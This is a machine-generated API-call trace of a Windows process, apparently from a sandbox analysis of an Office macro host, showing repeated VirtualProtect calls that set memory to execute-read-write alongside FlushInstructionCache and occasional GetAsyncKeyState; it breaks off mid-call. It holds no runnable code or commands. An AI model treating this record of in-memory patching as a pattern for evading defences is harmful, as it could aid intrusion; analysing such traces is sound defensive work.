[0100.958] GetCurrentProcess () returned 0xffffffff [0100.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0100.958] GetCurrentProcess () returned 0xffffffff [0100.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0100.958] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.959] GetCurrentProcess () returned 0xffffffff [0100.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0100.959] GetCurrentProcess () returned 0xffffffff [0100.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0100.959] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.960] GetCurrentProcess () returned 0xffffffff [0100.960] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0100.960] GetCurrentProcess () returned 0xffffffff [0100.960] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0100.960] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.961] GetCurrentProcess () returned 0xffffffff [0100.961] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0100.961] GetCurrentProcess () returned 0xffffffff [0100.961] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0100.961] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.961] GetCurrentProcess () returned 0xffffffff [0100.961] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0100.961] GetCurrentProcess () returned 0xffffffff [0100.961] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0100.961] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.962] GetCurrentProcess () returned 0xffffffff [0100.962] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0100.962] GetCurrentProcess () returned 0xffffffff [0100.962] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0100.962] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.963] GetCurrentProcess () returned 0xffffffff [0100.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0100.963] GetCurrentProcess () returned 0xffffffff [0100.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0100.963] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.963] GetCurrentProcess () returned 0xffffffff [0100.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0100.963] GetCurrentProcess () returned 0xffffffff [0100.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0100.964] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0100.964] GetCurrentProcess () returned 0xffffffff [0100.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0100.965] GetAsyncKeyState (vKey=3) returned 0 [0100.965] CRetailMalloc_Alloc () returned 0xc9fad60 [0100.965] memcpy (in: _Dst=0xcb65188, _Src=0x1973fc, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.965] memcpy (in: _Dst=0xc9fad80, _Src=0x197464, _Size=0x18 | out: _Dst=0xc9fad80) returned 0xc9fad80 [0100.965] CRetailMalloc_Realloc () returned 0xc9fad60 [0100.965] CRetailMalloc_Free () returned 0x1 [0100.965] GetCurrentProcess () returned 0xffffffff [0100.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0100.965] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0100.966] GetCurrentProcess () returned 0xffffffff [0100.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0100.966] GetCurrentProcess () returned 0xffffffff [0100.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0100.966] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0100.966] GetCurrentProcess () returned 0xffffffff [0100.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0100.966] GetCurrentProcess () returned 0xffffffff [0100.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0100.966] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0100.967] GetCurrentProcess () returned 0xffffffff [0100.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0100.967] GetCurrentProcess () returned 0xffffffff [0100.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0100.967] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0100.967] GetCurrentProcess () returned 0xffffffff [0100.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0100.967] GetCurrentProcess () returned 0xffffffff [0100.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0100.967] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0100.968] GetCurrentProcess () returned 0xffffffff [0100.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0100.968] GetCurrentProcess () returned 0xffffffff [0100.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0100.968] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0100.968] GetCurrentProcess () returned 0xffffffff [0100.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0100.968] GetCurrentProcess () returned 0xffffffff [0100.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0100.968] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0100.969] GetCurrentProcess () returned 0xffffffff [0100.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0100.969] GetCurrentProcess () returned 0xffffffff [0100.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0100.969] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0100.969] GetCurrentProcess () returned 0xffffffff [0100.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0100.969] GetCurrentProcess () returned 0xffffffff [0100.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0100.969] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.032] GetCurrentProcess () returned 0xffffffff [0101.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0101.032] GetCurrentProcess () returned 0xffffffff [0101.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0101.032] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.034] GetCurrentProcess () returned 0xffffffff [0101.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0101.034] GetCurrentProcess () returned 0xffffffff [0101.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0101.034] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.035] GetCurrentProcess () returned 0xffffffff [0101.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0101.035] GetCurrentProcess () returned 0xffffffff [0101.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0101.035] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.035] GetCurrentProcess () returned 0xffffffff [0101.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0101.035] GetCurrentProcess () returned 0xffffffff [0101.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0101.035] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.036] GetCurrentProcess () returned 0xffffffff [0101.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0101.036] GetCurrentProcess () returned 0xffffffff [0101.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0101.036] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.036] GetCurrentProcess () returned 0xffffffff [0101.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0101.036] GetCurrentProcess () returned 0xffffffff [0101.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0101.036] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.037] GetCurrentProcess () returned 0xffffffff [0101.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0101.037] GetCurrentProcess () returned 0xffffffff [0101.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0101.037] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.037] GetCurrentProcess () returned 0xffffffff [0101.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0101.037] GetCurrentProcess () returned 0xffffffff [0101.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0101.037] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.038] GetCurrentProcess () returned 0xffffffff [0101.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0101.038] GetCurrentProcess () returned 0xffffffff [0101.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0101.038] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.038] GetCurrentProcess () returned 0xffffffff [0101.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0101.038] GetCurrentProcess () returned 0xffffffff [0101.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0101.038] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.039] GetCurrentProcess () returned 0xffffffff [0101.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0101.039] GetCurrentProcess () returned 0xffffffff [0101.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0101.039] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.039] GetCurrentProcess () returned 0xffffffff [0101.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0101.039] GetCurrentProcess () returned 0xffffffff [0101.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0101.039] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.040] GetCurrentProcess () returned 0xffffffff [0101.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0101.040] GetCurrentProcess () returned 0xffffffff [0101.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0101.040] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.041] GetCurrentProcess () returned 0xffffffff [0101.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0101.041] GetCurrentProcess () returned 0xffffffff [0101.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0101.041] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.041] GetCurrentProcess () returned 0xffffffff [0101.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0101.041] GetCurrentProcess () returned 0xffffffff [0101.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0101.041] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.042] GetCurrentProcess () returned 0xffffffff [0101.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0101.042] GetCurrentProcess () returned 0xffffffff [0101.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0101.042] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.042] GetCurrentProcess () returned 0xffffffff [0101.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0101.043] GetCurrentProcess () returned 0xffffffff [0101.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0101.043] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.043] GetCurrentProcess () returned 0xffffffff [0101.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0101.043] GetCurrentProcess () returned 0xffffffff [0101.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0101.043] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.044] GetCurrentProcess () returned 0xffffffff [0101.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0101.044] GetCurrentProcess () returned 0xffffffff [0101.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0101.044] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.044] GetCurrentProcess () returned 0xffffffff [0101.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0101.044] GetCurrentProcess () returned 0xffffffff [0101.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0101.044] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.045] GetCurrentProcess () returned 0xffffffff [0101.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0101.045] GetCurrentProcess () returned 0xffffffff [0101.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0101.045] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.045] GetCurrentProcess () returned 0xffffffff [0101.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0101.045] GetCurrentProcess () returned 0xffffffff [0101.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0101.045] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0101.046] GetCurrentProcess () returned 0xffffffff [0101.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0101.046] GetAsyncKeyState (vKey=3) returned 0 [0101.047] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0101.047] CRetailMalloc_Alloc () returned 0xc9fadc0 [0101.047] memcpy (in: _Dst=0xcb65188, _Src=0x19731c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0101.047] memcpy (in: _Dst=0xc9fade0, _Src=0x197384, _Size=0x18 | out: _Dst=0xc9fade0) returned 0xc9fade0 [0101.047] CRetailMalloc_Realloc () returned 0xc9fadc0 [0101.047] CRetailMalloc_Free () returned 0x1 [0101.047] GetCurrentProcess () returned 0xffffffff [0101.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0101.047] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.048] GetCurrentProcess () returned 0xffffffff [0101.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0101.048] GetCurrentProcess () returned 0xffffffff [0101.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0101.048] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.049] GetCurrentProcess () returned 0xffffffff [0101.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0101.049] GetCurrentProcess () returned 0xffffffff [0101.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0101.050] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.050] GetCurrentProcess () returned 0xffffffff [0101.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0101.050] GetCurrentProcess () returned 0xffffffff [0101.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0101.050] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.050] GetCurrentProcess () returned 0xffffffff [0101.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0101.050] GetCurrentProcess () returned 0xffffffff [0101.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0101.051] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.051] GetCurrentProcess () returned 0xffffffff [0101.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0101.051] GetCurrentProcess () returned 0xffffffff [0101.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0101.051] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.051] GetCurrentProcess () returned 0xffffffff [0101.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0101.051] GetCurrentProcess () returned 0xffffffff [0101.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0101.052] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.052] GetCurrentProcess () returned 0xffffffff [0101.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0101.052] GetCurrentProcess () returned 0xffffffff [0101.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0101.052] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.052] GetCurrentProcess () returned 0xffffffff [0101.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0101.052] GetCurrentProcess () returned 0xffffffff [0101.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0101.053] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.053] GetCurrentProcess () returned 0xffffffff [0101.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0101.053] GetCurrentProcess () returned 0xffffffff [0101.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0101.053] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.053] GetCurrentProcess () returned 0xffffffff [0101.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0101.054] GetCurrentProcess () returned 0xffffffff [0101.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0101.054] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.054] GetCurrentProcess () returned 0xffffffff [0101.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0101.054] GetCurrentProcess () returned 0xffffffff [0101.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0101.054] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.054] GetCurrentProcess () returned 0xffffffff [0101.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0101.055] GetCurrentProcess () returned 0xffffffff [0101.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0101.055] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.055] GetCurrentProcess () returned 0xffffffff [0101.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0101.055] GetCurrentProcess () returned 0xffffffff [0101.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0101.055] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.056] GetCurrentProcess () returned 0xffffffff [0101.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0101.056] GetCurrentProcess () returned 0xffffffff [0101.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0101.056] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.056] GetCurrentProcess () returned 0xffffffff [0101.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0101.056] GetCurrentProcess () returned 0xffffffff [0101.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0101.056] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.057] GetCurrentProcess () returned 0xffffffff [0101.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0101.057] GetCurrentProcess () returned 0xffffffff [0101.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, 